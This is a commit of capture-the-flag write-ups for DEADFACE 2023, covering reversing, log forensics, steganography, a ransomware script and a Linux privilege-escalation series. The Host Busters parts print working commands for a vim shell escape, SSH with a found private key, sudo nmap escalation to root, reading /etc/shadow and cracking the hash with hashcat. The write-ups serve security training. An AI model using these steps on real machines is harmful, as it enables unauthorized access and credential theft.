Add deadface 2023

_writeups/2023-deadface/Cereal Killer.md

@@ -0,0 +1,38 @@
+---
+tags:
+  - ctf
+  - reversing
+  - binary
+layout: ctf
+type: problem
+ctf: 2023-deadface
+category: Reverse Engineering
+title: Cereal Killer
+points: 50
+solved: true
+---
+
+
+# Cereal Killer
+
+## Instructions
+
+Created by: TheZeal0t
+
+How well do you know your DEADFACE hackers? Test your trivia knowledge of our beloved friends at our favorite hactivist collective! We’ll start with `bumpyhassan`. Even though he grates on `TheZeal0t` a bit, we find him to be absolutely ADORKABLE!!!
+
+Choose one of the binaries below to test your BH trivia knowlege.
+
+Enter the flag in the format: `flag{Ch33ri0z_R_his_FAV}`.
+
+## Solution
+
+After opening this binary up in Ghidra we can see that there's an encoded text and that the flag gets written out to us after we put in the correct password. However, I quickly noticed that the flag reading function does involve the guess that we input. Taking a closer look at the flag decoding routine, it's just grabbing every other letter of the string.
+
+![](attachments/Pasted%20image%2020231023234016.png)
+
+I just used a pencil and paper to write every other letter since the string was fairly short. I still don't know what their favorite breakfast cereal is.
+
+```
+flag{I_am_REDDY_for_FREDDY!!!}
+```

_writeups/2023-deadface/Host Busters.md

@@ -0,0 +1,181 @@
+---
+tags:
+  - ctf
+  - 2023-deadface
+  - forensics
+  - linux
+layout: ctf
+type: problem
+ctf: 2023-deadface
+category: forensics
+title: Host Busters
+points: 750
+solved: true
+---
+
+# Host Busters 1
+
+## Instructions
+
+Created by: syyntax
+
+Turbo Tactical has gained access to a DEADFACE machine that belongs to `gh0st404`. This machine was used to scan one of TGRI’s websites. See if you can find anything useful in the `vim` user’s directory.
+
+_On a side note, it’s also a good idea to collect anything you think might be useful in the future for going after DEADFACE._
+
+Submit the flag as `flag{flag_here}`.
+
+## Solution
+
+Connect to the container with the SSH credentials provided in the challenge description.
+
+Exit the vim interface with `:!/bin/bash` and read the first flag.
+
+```
+vim@fbca68866a64:~$ ls
+hostbusters1.txt
+vim@fbca68866a64:~$ cat hostbusters1.txt 
+flag{esc4P3_fr0m_th3_V1M}
+```
+
+# Host Busters 2
+
+## Instructions
+
+Now that you’ve escaped out of `vim`, scope out and characterize the machine. See if there are any other flags you can find without having to escalate to another user.
+
+Submit the flag as `flag{flag_here}`.
+
+## Solution
+
+While doing recon on the machine we see two listening services:
+- SSH on TCP port 22 (we're using this to connect to the machine)
+- Some UDP service on port 9023
+
+Connecting to the unknown service on the udp port gives us the flag.
+
+```
+vim@fbca68866a64:~$ ss -tulpn
+Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   Process                                                                         
+udp     UNCONN   0        0                0.0.0.0:9023          0.0.0.0:*       users:(("srv",pid=7,fd=3))                                                     
+tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*                                                                                      
+tcp     LISTEN   0        128                 [::]:22               [::]:*                                                                                      
+vim@fbca68866a64:~$ nc -u localhost 9023
+
+flag{Hunt_4_UDP_s3rv3r}
+```
+
+# Host Busters 3
+
+## Instructions
+
+Continue characterizing the machine. Is there any way you can escalate to a user that has permissions the `vim` user does not have? Find the flag associated with this user.
+
+Submit the flag as `flag{flag_here}`.
+
+## Solution
+
+Searching around we see the gh0st404 user's home directory which has the flag we want to read. However we're unable to read it with our current permissions.
+
+```
+vim@fbca68866a64:~$ ls /home
+gh0st404  mort1cia  spookyboi  vim
+
+vim@fbca68866a64:~$ cd /home/gh0st404/
+
+vim@fbca68866a64:/home/gh0st404$ ls
+config  hostbusters3.txt  id_rsa  tgri-alive.xml  tgri-scan.xml
+
+vim@fbca68866a64:/home/gh0st404$ cat hostbusters3.txt 
+cat: hostbusters3.txt: Permission denied
+```
+
+Use the `id_rsa` ssh key to connect to the machine locally as gh0st404.
+
+```
+vim@fbca68866a64:/home/gh0st404$ ssh -i id_rsa gh0st404@localhost
+
+gh0st404@fbca68866a64:~$ cat hostbusters3.txt 
+flag{Embr4c3_th3_K3y_t0_5ucc355!}
+```
+
+# Host Busters 4
+
+## Instructions
+
+TGRI believes a sensitive project proposal was compromised in a recent attack from DEADFACE. Find the proposal and submit the flag associated with this document.
+
+Submit the flag as `flag{flag_here}`.
+
+## Solution
+
+Now that we're the gh0st404 user, we can see that they have permission to run nmap with sudo permissions. 
+
+```
+gh0st404@fbca68866a64:~$ sudo -l
+Matching Defaults entries for gh0st404 on fbca68866a64:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
+
+User gh0st404 may run the following commands on fbca68866a64:
+    (ALL) NOPASSWD: /usr/bin/nmap
+    (ALL : ALL) NOPASSWD: /etc/init.d/ssh start
+```
+
+Use the escalation technique at [GTFOBins](https://gtfobins.github.io/gtfobins/nmap/#sudo) to escalate to root.
+
+```
+gh0st404@fbca68866a64:~$ TF=$(mktemp)
+gh0st404@fbca68866a64:~$ echo 'os.execute("/bin/bash")' > $TF
+gh0st404@fbca68866a64:~$ sudo nmap --script=$TF
+Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-24 06:11 UTC
+NSE: Warning: Loading '/tmp/tmp.J8glzTvOih' -- the recommended file extension is '.nse'.
+
+root@fbca68866a64:/home/gh0st404# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+Looking around for interesting documents we find a pdf. At the bottom of the pdf is the base64 encoded flag.
+
+```
+root@fbca68866a64:/home# ls
+gh0st404  mort1cia  spookyboi  vim
+
+root@fbca68866a64:/home# cd spookyboi/
+
+root@fbca68866a64:/home/spookyboi# ls
+proposal.pdf
+
+root@fbca68866a64:/home/spookyboi# tail -n 1 proposal.pdf | base64 -d 
+Host Busters 4: flag{Abus3_oF_p0w3R}
+```
+
+If you exfiltrate the pdf and open it in a pdf viewer, the flag is also at the bottom of document in red.
+
+# Host Busters 5
+
+## Instructions
+
+See if you can crack `gh0st404`’s password. Based on Ghost Town conversations, we suspect the password is found in common wordlists.
+
+Submit the flag as `flag{password}`.
+
+## Solution
+
+Since we're already root getting the password hash for gh0st is trivial.
+
+```
+root@fbca68866a64:/home/spookyboi# cat /etc/shadow | grep gh0st
+gh0st404:$6$5d63619132db26f0$4FF5/xxtU1.OPzv2OdnWmB0mG5kqyMGUCAW8crE5ZqS24v6i1sM806eh8SigsZLxeJs/EtK0RJuB.eD.wTjLp/:19568:0:99999:7:::
+```
+
+Grab just the hash portion of the shadow entry and feed it to hashcat. The challenge description hints that this should be easy to crack with a common wordlist like rockyou.
+
+```
+$ hashcat -m 1800 -a 0 hashes /usr/share/wordlists/rockyou.txt
+$6$5d63619132db26f0$4FF5/xxtU1.OPzv2OdnWmB0mG5kqyMGUCAW8crE5ZqS24v6i1sM806eh8SigsZLxeJs/EtK0RJuB.eD.wTjLp/:zaq12wsx
+```
+
+The final flag:
+```
+flag{zaq12wsx}
+```

_writeups/2023-deadface/Malum.md

@@ -0,0 +1,49 @@
+---
+tags:
+  - ctf
+  - 2023-deadface
+  - forensics
+  - windows
+layout: ctf
+type: problem
+ctf: 2023-deadface
+category: forensics
+title: Malum
+points: 75
+solved: true
+---
+
+# Malum
+
+## Instructions
+
+Created by: RP-01?
+
+Well, it happened. The ransomware event took us out but we are recovering. It's Tuesday now and time to head into the office. As you arrive your boss walks into the SOC with a sigh and look right to you; here we go. He drops a USB on your desk and says "I need you to go through all the logs to find out HOW these guys got valid credentials to attack us". Can you identify the threat vector that was used to gain persistence into the network by reading through security logs? What you find will be the flag.
+
+Submit the flag as `flag{flagText}`
+
+[Download File](#)  
+SHA1: `557c6ea508dd7ca7891fb254e5d137a7786fcc4e`
+
+## Prerequisites
+
+Install EvtxECmd and Timeline Explorer from [Eric Zimmerman](https://ericzimmerman.github.io/#!index)
+
+## Solution
+
+Using `EvtxECmd`, convert the Windows event logs from the EventLog format to CSV.
+
+```
+EvtxECmd.exe -f .\Maybehere.evtx --csv . --csvf maybehere.csv
+```
+
+Open `maybehere.csv` in Timeline Explorer and filter to failed logon attempts. (`Event ID = 4625`)
+
+![](attachments/Pasted%20image%2020231023224845.png)
+
+We can see logon attempts for `fkreuger` and `stabBingStabber1`. 
+
+The flag is `flag{stabBingStabber1}`.
+
+I think the threat vector that the challenge author was trying to portray was a user accidentally entering their password in the username field and having this logged.

_writeups/2023-deadface/Tin Balloon.md

@@ -0,0 +1,49 @@
+---
+tags:
+  - ctf
+  - 2023-deadface
+  - forensics
+  - mp3
+layout: ctf
+type: problem
+ctf: 2023-deadface
+category: forensics
+title: Tin Balloon
+points: 150
+solved: true
+---
+
+# Tin Balloon
+
+## Instructions
+
+Created by: Shamel
+
+We've discovered that DEADFACE was somehow able to extract a fair amount of data from Techno Global Research Industries. We are still working out the details, but we believe they crafted custom malware to gain access to one of TGRI's systems. We intercepted a Word document that we believe mentions the name of the malware, in addition to an audio file that was part of the same conversation. We're not sure what the link is between the two files, but I'm sure you can figure it out!
+
+Submit the flag as: `flag{executable_name}`. Example: `flag{malware.exe}`.
+
+[Download ZIP](#)  
+SHA1: `19d82c3dc14b342c3e3bd1e5761378ab821475e4`
+
+## Solution
+
+After extracting the ZIP, we are presented with two files: an MP3 and a .docx.
+
+Trying to open the docx shows that it is password-protected.
+
+Opening the mp3 in Audacity and switching the view from waveform to spectrogram reaveals the hidden message.
+
+![](attachments/Pasted%20image%2020231020153345.png)
+
+Using the secret message `Gr33dK1Lzz@11Wh0Per5u3` as the password to the .docx file unlocks the document. The document has the following text:
+
+```
+We have the ID card of one the brand new employees Alejandro, We now know the location of Techno Global, we have a man on sight that has been tailing him. We believe we can get into the facility at 3 am.
+
+We don’t know how long we can have a foothold on the system but we are going to use Wh1t3_N01Z3.exe to sent out a reverse shell. Be prepared to listen for the signal.
+```
+
+The challenge description says that the flag is the name of the malware.
+
+Flag: `flag{Wh1t3_N01Z3.exe}`

_writeups/2023-deadface/What's the Wallet.md

@@ -0,0 +1,41 @@
+---
+tags:
+  - ctf
+  - 2023-deadface
+  - forensics
+  - powershell
+layout: ctf
+type: problem
+ctf: 2023-deadface
+category: forensics
+title: What's the Wallet
+points: 20
+solved: true
+---
+
+# What's the Wallet
+
+## Instructions
+
+Created by: hotstovehove
+
+Ransomware was recently discovered on a system within De Monne’s network courtesy of a DEADFACE member. Luckily, they were able to restore from backups. You have been tasked with finding the Bitcoin wallet address from the provided sample so that it can be reported to the authorities. Locate the wallet address in the code sample and submit the flag as `flag{wallet_address}`.
+
+[Download File](#)  
+SHA1: `69c2fd859d7f3666349b41106bef348ce51ca0da`
+
+## Solution
+
+Looking through the Powershell script, we find a `Store-BtwWalletAddress` function with a base64-encoded Bitcoin wallet address.
+
+```powershell
+function Store-BtcWalletAddress {
+    `$global:BtcWalletAddress = [System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetBytes('bjMzaGE1bm96aXhlNnJyZzcxa2d3eWlubWt1c3gy'))
+```
+
+```
+$ echo "bjMzaGE1bm96aXhlNnJyZzcxa2d3eWlubWt1c3gy" | base64 -d
+n33ha5nozixe6rrg71kgwyinmkusx2
+
+flag{n33ha5nozixe6rrg71kgwyinmkusx2}
+```